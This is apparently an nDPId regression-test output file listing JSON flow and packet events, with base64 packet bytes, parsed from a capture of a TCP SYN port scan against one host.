+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsY04AADoGqySsEAAIQA2GNIzSGrfdUoMYAAAAAGACDAAR2AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsyRwAAC0GUlasEAAIQA2GNIzSn8\/dUoMYAAAAAGACCACQvwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAs5EIAACoGOjCsEAAIQA2GNIzSJcLdUoMYAAAAAGACDAAGzQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"synscan.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsSRoAAC0G0lisEAAIQA2GNIzSBGPdUoMYAAAAAGACCAAsLAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAs2foAAC8GP3isEAAIQA2GNIzSGPXdUoMYAAAAAGACEAAPmgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAs4dYAADUGMZysEAAIQA2GNIzSCd3dUoMYAAAAAGACCAAmsgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsjcYAADgGgqysEAAIQA2GNIzSG1jdUoMYAAAAAGACBAAZNwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsIAwAADIG9masEAAIQA2GNIzSBzDdUoMYAAAAAGACDAAlXwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsp2EAADgGaRGsEAAIQA2GNIzSARjdUoMYAAAAAGACBAAzdwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAskiYAACoGjEysEAAIQA2GNIzSBGvdUoMYAAAAAGACDAAoJAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAshE8AADYGjiOsEAAIQA2GNIzSJxLdUoMYAAAAAGACDAAFfQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsrUYAADkGYiysEAAIQA2GNIzSC8ndUoMYAAAAAGACCAAkxgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058530,"pkt":"ACYLMQczACWzv5HuCABFAAAsgTgAADcGkDqsEAAIQA2GNIzSArzdUoMYAAAAAGACEAAl0wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058531,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"synscan.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058531,"pkt":"ACYLMQczACWzv5HuCABFAAAs5cUAADMGL62sEAAIQA2GNIzSFXzdUoMYAAAAAGACEAATEwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058531,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058531,"pkt":"ACYLMQczACWzv5HuCABFAAAshYIAADMGj\/CsEAAIQA2GNIzSgA3dUoMYAAAAAGACEACogQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsj7IAADkGf8CsEAAIQA2GNIzTBDzdU4MZAAAAAGACCAAsUAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsoJUAACkGft2sEAAIQA2GNIzTFEbdU4MZAAAAAGACCAAcRgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAscMAAAC8GqLKsEAAIQA2GNIzTGoTdU4MZAAAAAGACEAAOCAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsna4AAC0GfcSsEAAIQA2GNIzTH23dU4MZAAAAAGACCAARHwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsUPgAADsGvHqsEAAIQA2GNIzTFTfdU4MZAAAAAGACEAATVQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsylkAACUGWRmsEAAIQA2GNIzTD2ndU4MZAAAAAGACCAAhIwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsiKIAACsGlNCsEAAIQA2GNIzTLr\/dU4MZAAAAAGACEAD5zAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsx0AAADoGRzKsEAAIQA2GNIzTIGzdU4MZAAAAAGACDAAMIAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsyMQAADQGS66sEAAIQA2GNIzTw0\/dU4MZAAAAAGACBABxPAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsS0MAADgGxS+sEAAIQA2GNIzTBJ\/dU4MZAAAAAGACBAAv7QAAAgQFtA=="} 